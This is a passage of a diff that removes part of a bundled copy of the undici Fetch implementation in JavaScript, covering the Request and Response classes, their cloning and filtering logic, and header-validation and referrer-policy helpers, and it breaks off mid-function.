- let finalBody = inputOrInitBody - - // 40. If initBody is null and inputBody is non-null, then: - if (initBody == null && inputBody != null) { - // 1. If input is unusable, then throw a TypeError. - if (util.isDisturbed(inputBody.stream) || inputBody.stream.locked) { - throw new TypeError( - 'Cannot construct a Request with a Request object that has already been used.' - ) - } - - // 2. Set finalBody to the result of creating a proxy for inputBody. - if (!TransformStream) { - TransformStream = (__nccwpck_require__(5356).TransformStream) - } - - // https://streams.spec.whatwg.org/#readablestream-create-a-proxy - const identityTransform = new TransformStream() - inputBody.stream.pipeThrough(identityTransform) - finalBody = { - source: inputBody.source, - length: inputBody.length, - stream: identityTransform.readable - } - } - - // 41. Set this’s request’s body to finalBody. - this[kState].body = finalBody - } - - // Returns request’s HTTP method, which is "GET" by default. - get method () { - webidl.brandCheck(this, Request) - - // The method getter steps are to return this’s request’s method. - return this[kState].method - } - - // Returns the URL of request as a string. - get url () { - webidl.brandCheck(this, Request) - - // The url getter steps are to return this’s request’s URL, serialized. - return URLSerializer(this[kState].url) - } - - // Returns a Headers object consisting of the headers associated with request. - // Note that headers added in the network layer by the user agent will not - // be accounted for in this object, e.g., the "Host" header. - get headers () { - webidl.brandCheck(this, Request) - - // The headers getter steps are to return this’s headers. - return this[kHeaders] - } - - // Returns the kind of resource requested by request, e.g., "document" - // or "script". - get destination () { - webidl.brandCheck(this, Request) - - // The destination getter are to return this’s request’s destination. - return this[kState].destination - } - - // Returns the referrer of request. Its value can be a same-origin URL if - // explicitly set in init, the empty string to indicate no referrer, and - // "about:client" when defaulting to the global’s default. This is used - // during fetching to determine the value of the `Referer` header of the - // request being made. - get referrer () { - webidl.brandCheck(this, Request) - - // 1. If this’s request’s referrer is "no-referrer", then return the - // empty string. - if (this[kState].referrer === 'no-referrer') { - return '' - } - - // 2. If this’s request’s referrer is "client", then return - // "about:client". - if (this[kState].referrer === 'client') { - return 'about:client' - } - - // Return this’s request’s referrer, serialized. - return this[kState].referrer.toString() - } - - // Returns the referrer policy associated with request. - // This is used during fetching to compute the value of the request’s - // referrer. - get referrerPolicy () { - webidl.brandCheck(this, Request) - - // The referrerPolicy getter steps are to return this’s request’s referrer policy. - return this[kState].referrerPolicy - } - - // Returns the mode associated with request, which is a string indicating - // whether the request will use CORS, or will be restricted to same-origin - // URLs. - get mode () { - webidl.brandCheck(this, Request) - - // The mode getter steps are to return this’s request’s mode. - return this[kState].mode - } - - // Returns the credentials mode associated with request, - // which is a string indicating whether credentials will be sent with the - // request always, never, or only when sent to a same-origin URL. - get credentials () { - // The credentials getter steps are to return this’s request’s credentials mode. - return this[kState].credentials - } - - // Returns the cache mode associated with request, - // which is a string indicating how the request will - // interact with the browser’s cache when fetching. - get cache () { - webidl.brandCheck(this, Request) - - // The cache getter steps are to return this’s request’s cache mode. - return this[kState].cache - } - - // Returns the redirect mode associated with request, - // which is a string indicating how redirects for the - // request will be handled during fetching. A request - // will follow redirects by default. - get redirect () { - webidl.brandCheck(this, Request) - - // The redirect getter steps are to return this’s request’s redirect mode. - return this[kState].redirect - } - - // Returns request’s subresource integrity metadata, which is a - // cryptographic hash of the resource being fetched. Its value - // consists of multiple hashes separated by whitespace. [SRI] - get integrity () { - webidl.brandCheck(this, Request) - - // The integrity getter steps are to return this’s request’s integrity - // metadata. - return this[kState].integrity - } - - // Returns a boolean indicating whether or not request can outlive the - // global in which it was created. - get keepalive () { - webidl.brandCheck(this, Request) - - // The keepalive getter steps are to return this’s request’s keepalive. - return this[kState].keepalive - } - - // Returns a boolean indicating whether or not request is for a reload - // navigation. - get isReloadNavigation () { - webidl.brandCheck(this, Request) - - // The isReloadNavigation getter steps are to return true if this’s - // request’s reload-navigation flag is set; otherwise false. - return this[kState].reloadNavigation - } - - // Returns a boolean indicating whether or not request is for a history - // navigation (a.k.a. back-foward navigation). - get isHistoryNavigation () { - webidl.brandCheck(this, Request) - - // The isHistoryNavigation getter steps are to return true if this’s request’s - // history-navigation flag is set; otherwise false. - return this[kState].historyNavigation - } - - // Returns the signal associated with request, which is an AbortSignal - // object indicating whether or not request has been aborted, and its - // abort event handler. - get signal () { - webidl.brandCheck(this, Request) - - // The signal getter steps are to return this’s signal. - return this[kSignal] - } - - get body () { - webidl.brandCheck(this, Request) - - return this[kState].body ? this[kState].body.stream : null - } - - get bodyUsed () { - webidl.brandCheck(this, Request) - - return !!this[kState].body && util.isDisturbed(this[kState].body.stream) - } - - get duplex () { - webidl.brandCheck(this, Request) - - return 'half' - } - - // Returns a clone of request. - clone () { - webidl.brandCheck(this, Request) - - // 1. If this is unusable, then throw a TypeError. - if (this.bodyUsed || this.body?.locked) { - throw new TypeError('unusable') - } - - // 2. Let clonedRequest be the result of cloning this’s request. - const clonedRequest = cloneRequest(this[kState]) - - // 3. Let clonedRequestObject be the result of creating a Request object, - // given clonedRequest, this’s headers’s guard, and this’s relevant Realm. - const clonedRequestObject = new Request(kConstruct) - clonedRequestObject[kState] = clonedRequest - clonedRequestObject[kRealm] = this[kRealm] - clonedRequestObject[kHeaders] = new Headers(kConstruct) - clonedRequestObject[kHeaders][kHeadersList] = clonedRequest.headersList - clonedRequestObject[kHeaders][kGuard] = this[kHeaders][kGuard] - clonedRequestObject[kHeaders][kRealm] = this[kHeaders][kRealm] - - // 4. Make clonedRequestObject’s signal follow this’s signal. - const ac = new AbortController() - if (this.signal.aborted) { - ac.abort(this.signal.reason) - } else { - util.addAbortListener( - this.signal, - () => { - ac.abort(this.signal.reason) - } - ) - } - clonedRequestObject[kSignal] = ac.signal - - // 4. Return clonedRequestObject. - return clonedRequestObject - } -} - -mixinBody(Request) - -function makeRequest (init) { - // https://fetch.spec.whatwg.org/#requests - const request = { - method: 'GET', - localURLsOnly: false, - unsafeRequest: false, - body: null, - client: null, - reservedClient: null, - replacesClientId: '', - window: 'client', - keepalive: false, - serviceWorkers: 'all', - initiator: '', - destination: '', - priority: null, - origin: 'client', - policyContainer: 'client', - referrer: 'client', - referrerPolicy: '', - mode: 'no-cors', - useCORSPreflightFlag: false, - credentials: 'same-origin', - useCredentials: false, - cache: 'default', - redirect: 'follow', - integrity: '', - cryptoGraphicsNonceMetadata: '', - parserMetadata: '', - reloadNavigation: false, - historyNavigation: false, - userActivation: false, - taintedOrigin: false, - redirectCount: 0, - responseTainting: 'basic', - preventNoCacheCacheControlHeaderModification: false, - done: false, - timingAllowFailed: false, - ...init, - headersList: init.headersList - ? new HeadersList(init.headersList) - : new HeadersList() - } - request.url = request.urlList[0] - return request -} - -// https://fetch.spec.whatwg.org/#concept-request-clone -function cloneRequest (request) { - // To clone a request request, run these steps: - - // 1. Let newRequest be a copy of request, except for its body. - const newRequest = makeRequest({ ...request, body: null }) - - // 2. If request’s body is non-null, set newRequest’s body to the - // result of cloning request’s body. - if (request.body != null) { - newRequest.body = cloneBody(request.body) - } - - // 3. Return newRequest. - return newRequest -} - -Object.defineProperties(Request.prototype, { - method: kEnumerableProperty, - url: kEnumerableProperty, - headers: kEnumerableProperty, - redirect: kEnumerableProperty, - clone: kEnumerableProperty, - signal: kEnumerableProperty, - duplex: kEnumerableProperty, - destination: kEnumerableProperty, - body: kEnumerableProperty, - bodyUsed: kEnumerableProperty, - isHistoryNavigation: kEnumerableProperty, - isReloadNavigation: kEnumerableProperty, - keepalive: kEnumerableProperty, - integrity: kEnumerableProperty, - cache: kEnumerableProperty, - credentials: kEnumerableProperty, - attribute: kEnumerableProperty, - referrerPolicy: kEnumerableProperty, - referrer: kEnumerableProperty, - mode: kEnumerableProperty, - [Symbol.toStringTag]: { - value: 'Request', - configurable: true - } -}) - -webidl.converters.Request = webidl.interfaceConverter( - Request -) - -// https://fetch.spec.whatwg.org/#requestinfo -webidl.converters.RequestInfo = function (V) { - if (typeof V === 'string') { - return webidl.converters.USVString(V) - } - - if (V instanceof Request) { - return webidl.converters.Request(V) - } - - return webidl.converters.USVString(V) -} - -webidl.converters.AbortSignal = webidl.interfaceConverter( - AbortSignal -) - -// https://fetch.spec.whatwg.org/#requestinit -webidl.converters.RequestInit = webidl.dictionaryConverter([ - { - key: 'method', - converter: webidl.converters.ByteString - }, - { - key: 'headers', - converter: webidl.converters.HeadersInit - }, - { - key: 'body', - converter: webidl.nullableConverter( - webidl.converters.BodyInit - ) - }, - { - key: 'referrer', - converter: webidl.converters.USVString - }, - { - key: 'referrerPolicy', - converter: webidl.converters.DOMString, - // https://w3c.github.io/webappsec-referrer-policy/#referrer-policy - allowedValues: referrerPolicy - }, - { - key: 'mode', - converter: webidl.converters.DOMString, - // https://fetch.spec.whatwg.org/#concept-request-mode - allowedValues: requestMode - }, - { - key: 'credentials', - converter: webidl.converters.DOMString, - // https://fetch.spec.whatwg.org/#requestcredentials - allowedValues: requestCredentials - }, - { - key: 'cache', - converter: webidl.converters.DOMString, - // https://fetch.spec.whatwg.org/#requestcache - allowedValues: requestCache - }, - { - key: 'redirect', - converter: webidl.converters.DOMString, - // https://fetch.spec.whatwg.org/#requestredirect - allowedValues: requestRedirect - }, - { - key: 'integrity', - converter: webidl.converters.DOMString - }, - { - key: 'keepalive', - converter: webidl.converters.boolean - }, - { - key: 'signal', - converter: webidl.nullableConverter( - (signal) => webidl.converters.AbortSignal( - signal, - { strict: false } - ) - ) - }, - { - key: 'window', - converter: webidl.converters.any - }, - { - key: 'duplex', - converter: webidl.converters.DOMString, - allowedValues: requestDuplex - } -]) - -module.exports = { Request, makeRequest } - - -/***/ }), - -/***/ 7823: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { Headers, HeadersList, fill } = __nccwpck_require__(554) -const { extractBody, cloneBody, mixinBody } = __nccwpck_require__(1472) -const util = __nccwpck_require__(3983) -const { kEnumerableProperty } = util -const { - isValidReasonPhrase, - isCancelled, - isAborted, - isBlobLike, - serializeJavascriptValueToJSONString, - isErrorLike, - isomorphicEncode -} = __nccwpck_require__(2538) -const { - redirectStatusSet, - nullBodyStatus, - DOMException -} = __nccwpck_require__(1037) -const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) -const { webidl } = __nccwpck_require__(1744) -const { FormData } = __nccwpck_require__(2015) -const { getGlobalOrigin } = __nccwpck_require__(1246) -const { URLSerializer } = __nccwpck_require__(685) -const { kHeadersList, kConstruct } = __nccwpck_require__(2785) -const assert = __nccwpck_require__(9491) -const { types } = __nccwpck_require__(3837) - -const ReadableStream = globalThis.ReadableStream || (__nccwpck_require__(5356).ReadableStream) -const textEncoder = new TextEncoder('utf-8') - -// https://fetch.spec.whatwg.org/#response-class -class Response { - // Creates network error Response. - static error () { - // TODO - const relevantRealm = { settingsObject: {} } - - // The static error() method steps are to return the result of creating a - // Response object, given a new network error, "immutable", and this’s - // relevant Realm. - const responseObject = new Response() - responseObject[kState] = makeNetworkError() - responseObject[kRealm] = relevantRealm - responseObject[kHeaders][kHeadersList] = responseObject[kState].headersList - responseObject[kHeaders][kGuard] = 'immutable' - responseObject[kHeaders][kRealm] = relevantRealm - return responseObject - } - - // https://fetch.spec.whatwg.org/#dom-response-json - static json (data, init = {}) { - webidl.argumentLengthCheck(arguments, 1, { header: 'Response.json' }) - - if (init !== null) { - init = webidl.converters.ResponseInit(init) - } - - // 1. Let bytes the result of running serialize a JavaScript value to JSON bytes on data. - const bytes = textEncoder.encode( - serializeJavascriptValueToJSONString(data) - ) - - // 2. Let body be the result of extracting bytes. - const body = extractBody(bytes) - - // 3. Let responseObject be the result of creating a Response object, given a new response, - // "response", and this’s relevant Realm. - const relevantRealm = { settingsObject: {} } - const responseObject = new Response() - responseObject[kRealm] = relevantRealm - responseObject[kHeaders][kGuard] = 'response' - responseObject[kHeaders][kRealm] = relevantRealm - - // 4. Perform initialize a response given responseObject, init, and (body, "application/json"). - initializeResponse(responseObject, init, { body: body[0], type: 'application/json' }) - - // 5. Return responseObject. - return responseObject - } - - // Creates a redirect Response that redirects to url with status status. - static redirect (url, status = 302) { - const relevantRealm = { settingsObject: {} } - - webidl.argumentLengthCheck(arguments, 1, { header: 'Response.redirect' }) - - url = webidl.converters.USVString(url) - status = webidl.converters['unsigned short'](status) - - // 1. Let parsedURL be the result of parsing url with current settings - // object’s API base URL. - // 2. If parsedURL is failure, then throw a TypeError. - // TODO: base-URL? - let parsedURL - try { - parsedURL = new URL(url, getGlobalOrigin()) - } catch (err) { - throw Object.assign(new TypeError('Failed to parse URL from ' + url), { - cause: err - }) - } - - // 3. If status is not a redirect status, then throw a RangeError. - if (!redirectStatusSet.has(status)) { - throw new RangeError('Invalid status code ' + status) - } - - // 4. Let responseObject be the result of creating a Response object, - // given a new response, "immutable", and this’s relevant Realm. - const responseObject = new Response() - responseObject[kRealm] = relevantRealm - responseObject[kHeaders][kGuard] = 'immutable' - responseObject[kHeaders][kRealm] = relevantRealm - - // 5. Set responseObject’s response’s status to status. - responseObject[kState].status = status - - // 6. Let value be parsedURL, serialized and isomorphic encoded. - const value = isomorphicEncode(URLSerializer(parsedURL)) - - // 7. Append `Location`/value to responseObject’s response’s header list. - responseObject[kState].headersList.append('location', value) - - // 8. Return responseObject. - return responseObject - } - - // https://fetch.spec.whatwg.org/#dom-response - constructor (body = null, init = {}) { - if (body !== null) { - body = webidl.converters.BodyInit(body) - } - - init = webidl.converters.ResponseInit(init) - - // TODO - this[kRealm] = { settingsObject: {} } - - // 1. Set this’s response to a new response. - this[kState] = makeResponse({}) - - // 2. Set this’s headers to a new Headers object with this’s relevant - // Realm, whose header list is this’s response’s header list and guard - // is "response". - this[kHeaders] = new Headers(kConstruct) - this[kHeaders][kGuard] = 'response' - this[kHeaders][kHeadersList] = this[kState].headersList - this[kHeaders][kRealm] = this[kRealm] - - // 3. Let bodyWithType be null. - let bodyWithType = null - - // 4. If body is non-null, then set bodyWithType to the result of extracting body. - if (body != null) { - const [extractedBody, type] = extractBody(body) - bodyWithType = { body: extractedBody, type } - } - - // 5. Perform initialize a response given this, init, and bodyWithType. - initializeResponse(this, init, bodyWithType) - } - - // Returns response’s type, e.g., "cors". - get type () { - webidl.brandCheck(this, Response) - - // The type getter steps are to return this’s response’s type. - return this[kState].type - } - - // Returns response’s URL, if it has one; otherwise the empty string. - get url () { - webidl.brandCheck(this, Response) - - const urlList = this[kState].urlList - - // The url getter steps are to return the empty string if this’s - // response’s URL is null; otherwise this’s response’s URL, - // serialized with exclude fragment set to true. - const url = urlList[urlList.length - 1] ?? null - - if (url === null) { - return '' - } - - return URLSerializer(url, true) - } - - // Returns whether response was obtained through a redirect. - get redirected () { - webidl.brandCheck(this, Response) - - // The redirected getter steps are to return true if this’s response’s URL - // list has more than one item; otherwise false. - return this[kState].urlList.length > 1 - } - - // Returns response’s status. - get status () { - webidl.brandCheck(this, Response) - - // The status getter steps are to return this’s response’s status. - return this[kState].status - } - - // Returns whether response’s status is an ok status. - get ok () { - webidl.brandCheck(this, Response) - - // The ok getter steps are to return true if this’s response’s status is an - // ok status; otherwise false. - return this[kState].status >= 200 && this[kState].status <= 299 - } - - // Returns response’s status message. - get statusText () { - webidl.brandCheck(this, Response) - - // The statusText getter steps are to return this’s response’s status - // message. - return this[kState].statusText - } - - // Returns response’s headers as Headers. - get headers () { - webidl.brandCheck(this, Response) - - // The headers getter steps are to return this’s headers. - return this[kHeaders] - } - - get body () { - webidl.brandCheck(this, Response) - - return this[kState].body ? this[kState].body.stream : null - } - - get bodyUsed () { - webidl.brandCheck(this, Response) - - return !!this[kState].body && util.isDisturbed(this[kState].body.stream) - } - - // Returns a clone of response. - clone () { - webidl.brandCheck(this, Response) - - // 1. If this is unusable, then throw a TypeError. - if (this.bodyUsed || (this.body && this.body.locked)) { - throw webidl.errors.exception({ - header: 'Response.clone', - message: 'Body has already been consumed.' - }) - } - - // 2. Let clonedResponse be the result of cloning this’s response. - const clonedResponse = cloneResponse(this[kState]) - - // 3. Return the result of creating a Response object, given - // clonedResponse, this’s headers’s guard, and this’s relevant Realm. - const clonedResponseObject = new Response() - clonedResponseObject[kState] = clonedResponse - clonedResponseObject[kRealm] = this[kRealm] - clonedResponseObject[kHeaders][kHeadersList] = clonedResponse.headersList - clonedResponseObject[kHeaders][kGuard] = this[kHeaders][kGuard] - clonedResponseObject[kHeaders][kRealm] = this[kHeaders][kRealm] - - return clonedResponseObject - } -} - -mixinBody(Response) - -Object.defineProperties(Response.prototype, { - type: kEnumerableProperty, - url: kEnumerableProperty, - status: kEnumerableProperty, - ok: kEnumerableProperty, - redirected: kEnumerableProperty, - statusText: kEnumerableProperty, - headers: kEnumerableProperty, - clone: kEnumerableProperty, - body: kEnumerableProperty, - bodyUsed: kEnumerableProperty, - [Symbol.toStringTag]: { - value: 'Response', - configurable: true - } -}) - -Object.defineProperties(Response, { - json: kEnumerableProperty, - redirect: kEnumerableProperty, - error: kEnumerableProperty -}) - -// https://fetch.spec.whatwg.org/#concept-response-clone -function cloneResponse (response) { - // To clone a response response, run these steps: - - // 1. If response is a filtered response, then return a new identical - // filtered response whose internal response is a clone of response’s - // internal response. - if (response.internalResponse) { - return filterResponse( - cloneResponse(response.internalResponse), - response.type - ) - } - - // 2. Let newResponse be a copy of response, except for its body. - const newResponse = makeResponse({ ...response, body: null }) - - // 3. If response’s body is non-null, then set newResponse’s body to the - // result of cloning response’s body. - if (response.body != null) { - newResponse.body = cloneBody(response.body) - } - - // 4. Return newResponse. - return newResponse -} - -function makeResponse (init) { - return { - aborted: false, - rangeRequested: false, - timingAllowPassed: false, - requestIncludesCredentials: false, - type: 'default', - status: 200, - timingInfo: null, - cacheState: '', - statusText: '', - ...init, - headersList: init.headersList - ? new HeadersList(init.headersList) - : new HeadersList(), - urlList: init.urlList ? [...init.urlList] : [] - } -} - -function makeNetworkError (reason) { - const isError = isErrorLike(reason) - return makeResponse({ - type: 'error', - status: 0, - error: isError - ? reason - : new Error(reason ? String(reason) : reason), - aborted: reason && reason.name === 'AbortError' - }) -} - -function makeFilteredResponse (response, state) { - state = { - internalResponse: response, - ...state - } - - return new Proxy(response, { - get (target, p) { - return p in state ? state[p] : target[p] - }, - set (target, p, value) { - assert(!(p in state)) - target[p] = value - return true - } - }) -} - -// https://fetch.spec.whatwg.org/#concept-filtered-response -function filterResponse (response, type) { - // Set response to the following filtered response with response as its - // internal response, depending on request’s response tainting: - if (type === 'basic') { - // A basic filtered response is a filtered response whose type is "basic" - // and header list excludes any headers in internal response’s header list - // whose name is a forbidden response-header name. - - // Note: undici does not implement forbidden response-header names - return makeFilteredResponse(response, { - type: 'basic', - headersList: response.headersList - }) - } else if (type === 'cors') { - // A CORS filtered response is a filtered response whose type is "cors" - // and header list excludes any headers in internal response’s header - // list whose name is not a CORS-safelisted response-header name, given - // internal response’s CORS-exposed header-name list. - - // Note: undici does not implement CORS-safelisted response-header names - return makeFilteredResponse(response, { - type: 'cors', - headersList: response.headersList - }) - } else if (type === 'opaque') { - // An opaque filtered response is a filtered response whose type is - // "opaque", URL list is the empty list, status is 0, status message - // is the empty byte sequence, header list is empty, and body is null. - - return makeFilteredResponse(response, { - type: 'opaque', - urlList: Object.freeze([]), - status: 0, - statusText: '', - body: null - }) - } else if (type === 'opaqueredirect') { - // An opaque-redirect filtered response is a filtered response whose type - // is "opaqueredirect", status is 0, status message is the empty byte - // sequence, header list is empty, and body is null. - - return makeFilteredResponse(response, { - type: 'opaqueredirect', - status: 0, - statusText: '', - headersList: [], - body: null - }) - } else { - assert(false) - } -} - -// https://fetch.spec.whatwg.org/#appropriate-network-error -function makeAppropriateNetworkError (fetchParams, err = null) { - // 1. Assert: fetchParams is canceled. - assert(isCancelled(fetchParams)) - - // 2. Return an aborted network error if fetchParams is aborted; - // otherwise return a network error. - return isAborted(fetchParams) - ? makeNetworkError(Object.assign(new DOMException('The operation was aborted.', 'AbortError'), { cause: err })) - : makeNetworkError(Object.assign(new DOMException('Request was cancelled.'), { cause: err })) -} - -// https://whatpr.org/fetch/1392.html#initialize-a-response -function initializeResponse (response, init, body) { - // 1. If init["status"] is not in the range 200 to 599, inclusive, then - // throw a RangeError. - if (init.status !== null && (init.status < 200 || init.status > 599)) { - throw new RangeError('init["status"] must be in the range of 200 to 599, inclusive.') - } - - // 2. If init["statusText"] does not match the reason-phrase token production, - // then throw a TypeError. - if ('statusText' in init && init.statusText != null) { - // See, https://datatracker.ietf.org/doc/html/rfc7230#section-3.1.2: - // reason-phrase = *( HTAB / SP / VCHAR / obs-text ) - if (!isValidReasonPhrase(String(init.statusText))) { - throw new TypeError('Invalid statusText') - } - } - - // 3. Set response’s response’s status to init["status"]. - if ('status' in init && init.status != null) { - response[kState].status = init.status - } - - // 4. Set response’s response’s status message to init["statusText"]. - if ('statusText' in init && init.statusText != null) { - response[kState].statusText = init.statusText - } - - // 5. If init["headers"] exists, then fill response’s headers with init["headers"]. - if ('headers' in init && init.headers != null) { - fill(response[kHeaders], init.headers) - } - - // 6. If body was given, then: - if (body) { - // 1. If response's status is a null body status, then throw a TypeError. - if (nullBodyStatus.includes(response.status)) { - throw webidl.errors.exception({ - header: 'Response constructor', - message: 'Invalid response status code ' + response.status - }) - } - - // 2. Set response's body to body's body. - response[kState].body = body.body - - // 3. If body's type is non-null and response's header list does not contain - // `Content-Type`, then append (`Content-Type`, body's type) to response's header list. - if (body.type != null && !response[kState].headersList.contains('Content-Type')) { - response[kState].headersList.append('content-type', body.type) - } - } -} - -webidl.converters.ReadableStream = webidl.interfaceConverter( - ReadableStream -) - -webidl.converters.FormData = webidl.interfaceConverter( - FormData -) - -webidl.converters.URLSearchParams = webidl.interfaceConverter( - URLSearchParams -) - -// https://fetch.spec.whatwg.org/#typedefdef-xmlhttprequestbodyinit -webidl.converters.XMLHttpRequestBodyInit = function (V) { - if (typeof V === 'string') { - return webidl.converters.USVString(V) - } - - if (isBlobLike(V)) { - return webidl.converters.Blob(V, { strict: false }) - } - - if (types.isArrayBuffer(V) || types.isTypedArray(V) || types.isDataView(V)) { - return webidl.converters.BufferSource(V) - } - - if (util.isFormDataLike(V)) { - return webidl.converters.FormData(V, { strict: false }) - } - - if (V instanceof URLSearchParams) { - return webidl.converters.URLSearchParams(V) - } - - return webidl.converters.DOMString(V) -} - -// https://fetch.spec.whatwg.org/#bodyinit -webidl.converters.BodyInit = function (V) { - if (V instanceof ReadableStream) { - return webidl.converters.ReadableStream(V) - } - - // Note: the spec doesn't include async iterables, - // this is an undici extension. - if (V?.[Symbol.asyncIterator]) { - return V - } - - return webidl.converters.XMLHttpRequestBodyInit(V) -} - -webidl.converters.ResponseInit = webidl.dictionaryConverter([ - { - key: 'status', - converter: webidl.converters['unsigned short'], - defaultValue: 200 - }, - { - key: 'statusText', - converter: webidl.converters.ByteString, - defaultValue: '' - }, - { - key: 'headers', - converter: webidl.converters.HeadersInit - } -]) - -module.exports = { - makeNetworkError, - makeResponse, - makeAppropriateNetworkError, - filterResponse, - Response, - cloneResponse -} - - -/***/ }), - -/***/ 5861: -/***/ ((module) => { - -"use strict"; - - -module.exports = { - kUrl: Symbol('url'), - kHeaders: Symbol('headers'), - kSignal: Symbol('signal'), - kState: Symbol('state'), - kGuard: Symbol('guard'), - kRealm: Symbol('realm') -} - - -/***/ }), - -/***/ 2538: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { redirectStatusSet, referrerPolicySet: referrerPolicyTokens, badPortsSet } = __nccwpck_require__(1037) -const { getGlobalOrigin } = __nccwpck_require__(1246) -const { performance } = __nccwpck_require__(4074) -const { isBlobLike, toUSVString, ReadableStreamFrom } = __nccwpck_require__(3983) -const assert = __nccwpck_require__(9491) -const { isUint8Array } = __nccwpck_require__(9830) - -// https://nodejs.org/api/crypto.html#determining-if-crypto-support-is-unavailable -/** @type {import('crypto')|undefined} */ -let crypto - -try { - crypto = __nccwpck_require__(6113) -} catch { - -} - -function responseURL (response) { - // https://fetch.spec.whatwg.org/#responses - // A response has an associated URL. It is a pointer to the last URL - // in response’s URL list and null if response’s URL list is empty. - const urlList = response.urlList - const length = urlList.length - return length === 0 ? null : urlList[length - 1].toString() -} - -// https://fetch.spec.whatwg.org/#concept-response-location-url -function responseLocationURL (response, requestFragment) { - // 1. If response’s status is not a redirect status, then return null. - if (!redirectStatusSet.has(response.status)) { - return null - } - - // 2. Let location be the result of extracting header list values given - // `Location` and response’s header list. - let location = response.headersList.get('location') - - // 3. If location is a header value, then set location to the result of - // parsing location with response’s URL. - if (location !== null && isValidHeaderValue(location)) { - location = new URL(location, responseURL(response)) - } - - // 4. If location is a URL whose fragment is null, then set location’s - // fragment to requestFragment. - if (location && !location.hash) { - location.hash = requestFragment - } - - // 5. Return location. - return location -} - -/** @returns {URL} */ -function requestCurrentURL (request) { - return request.urlList[request.urlList.length - 1] -} - -function requestBadPort (request) { - // 1. Let url be request’s current URL. - const url = requestCurrentURL(request) - - // 2. If url’s scheme is an HTTP(S) scheme and url’s port is a bad port, - // then return blocked. - if (urlIsHttpHttpsScheme(url) && badPortsSet.has(url.port)) { - return 'blocked' - } - - // 3. Return allowed. - return 'allowed' -} - -function isErrorLike (object) { - return object instanceof Error || ( - object?.constructor?.name === 'Error' || - object?.constructor?.name === 'DOMException' - ) -} - -// Check whether |statusText| is a ByteString and -// matches the Reason-Phrase token production. -// RFC 2616: https://tools.ietf.org/html/rfc2616 -// RFC 7230: https://tools.ietf.org/html/rfc7230 -// "reason-phrase = *( HTAB / SP / VCHAR / obs-text )" -// https://github.com/chromium/chromium/blob/94.0.4604.1/third_party/blink/renderer/core/fetch/response.cc#L116 -function isValidReasonPhrase (statusText) { - for (let i = 0; i < statusText.length; ++i) { - const c = statusText.charCodeAt(i) - if ( - !( - ( - c === 0x09 || // HTAB - (c >= 0x20 && c <= 0x7e) || // SP / VCHAR - (c >= 0x80 && c <= 0xff) - ) // obs-text - ) - ) { - return false - } - } - return true -} - -/** - * @see https://tools.ietf.org/html/rfc7230#section-3.2.6 - * @param {number} c - */ -function isTokenCharCode (c) { - switch (c) { - case 0x22: - case 0x28: - case 0x29: - case 0x2c: - case 0x2f: - case 0x3a: - case 0x3b: - case 0x3c: - case 0x3d: - case 0x3e: - case 0x3f: - case 0x40: - case 0x5b: - case 0x5c: - case 0x5d: - case 0x7b: - case 0x7d: - // DQUOTE and "(),/:;<=>?@[\]{}" - return false - default: - // VCHAR %x21-7E - return c >= 0x21 && c <= 0x7e - } -} - -/** - * @param {string} characters - */ -function isValidHTTPToken (characters) { - if (characters.length === 0) { - return false - } - for (let i = 0; i < characters.length; ++i) { - if (!isTokenCharCode(characters.charCodeAt(i))) { - return false - } - } - return true -} - -/** - * @see https://fetch.spec.whatwg.org/#header-name - * @param {string} potentialValue - */ -function isValidHeaderName (potentialValue) { - return isValidHTTPToken(potentialValue) -} - -/** - * @see https://fetch.spec.whatwg.org/#header-value - * @param {string} potentialValue - */ -function isValidHeaderValue (potentialValue) { - // - Has no leading or trailing HTTP tab or space bytes. - // - Contains no 0x00 (NUL) or HTTP newline bytes. - if ( - potentialValue.startsWith('\t') || - potentialValue.startsWith(' ') || - potentialValue.endsWith('\t') || - potentialValue.endsWith(' ') - ) { - return false - } - - if ( - potentialValue.includes('\0') || - potentialValue.includes('\r') || - potentialValue.includes('\n') - ) { - return false - } - - return true -} - -// https://w3c.github.io/webappsec-referrer-policy/#set-requests-referrer-policy-on-redirect -function setRequestReferrerPolicyOnRedirect (request, actualResponse) { - // Given a request request and a response actualResponse, this algorithm - // updates request’s referrer policy according to the Referrer-Policy - // header (if any) in actualResponse. - - // 1. Let policy be the result of executing § 8.1 Parse a referrer policy - // from a Referrer-Policy header on actualResponse. - - // 8.1 Parse a referrer policy from a Referrer-Policy header - // 1. Let policy-tokens be the result of extracting header list values given `Referrer-Policy` and response’s header list. - const { headersList } = actualResponse - // 2. Let policy be the empty string. - // 3. For each token in policy-tokens, if token is a referrer policy and token is not the empty string, then set policy to token. - // 4. Return policy. - const policyHeader = (headersList.get('referrer-policy') ?? '').split(',') - - // Note: As the referrer-policy can contain multiple policies - // separated by comma, we need to loop through all of them - // and pick the first valid one. - // Ref: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referrer-Policy#specify_a_fallback_policy - let policy = '' - if (policyHeader.length > 0) { - // The right-most policy takes precedence. - // The left-most policy is the fallback. - for (let i = policyHeader.length; i !== 0; i--) { - const token = policyHeader[i - 1].trim() - if (referrerPolicyTokens.has(token)) { - policy = token - break - } - } - } - - // 2. If policy is not the empty string, then set request’s referrer policy to policy. - if (policy !== '') { - request.referrerPolicy = policy - } -} - -// https://fetch.spec.whatwg.org/#cross-origin-resource-policy-check -function crossOriginResourcePolicyCheck () { - // TODO - return 'allowed' -} - -// https://fetch.spec.whatwg.org/#concept-cors-check -function corsCheck () { - // TODO - return 'success' -} - -// https://fetch.spec.whatwg.org/#concept-tao-check -function TAOCheck () { - // TODO - return 'success' -} - -function appendFetchMetadata (httpRequest) { - // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-dest-header - // TODO - - // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-mode-header - - // 1. Assert: r’s url is a potentially trustworthy URL. - // TODO - - // 2. Let header be a Structured Header whose value is a token. - let header = null - - // 3. Set header’s value to r’s mode. - header = httpRequest.mode - - // 4. Set a structured field value `Sec-Fetch-Mode`/header in r’s header list. - httpRequest.headersList.set('sec-fetch-mode', header) - - // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-site-header - // TODO - - // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-user-header - // TODO -} - -// https://fetch.spec.whatwg.org/#append-a-request-origin-header -function appendRequestOriginHeader (request) { - // 1. Let serializedOrigin be the result of byte-serializing a request origin with request. - let serializedOrigin = request.origin - - // 2. If request’s response tainting is "cors" or request’s mode is "websocket", then append (`Origin`, serializedOrigin) to request’s header list. - if 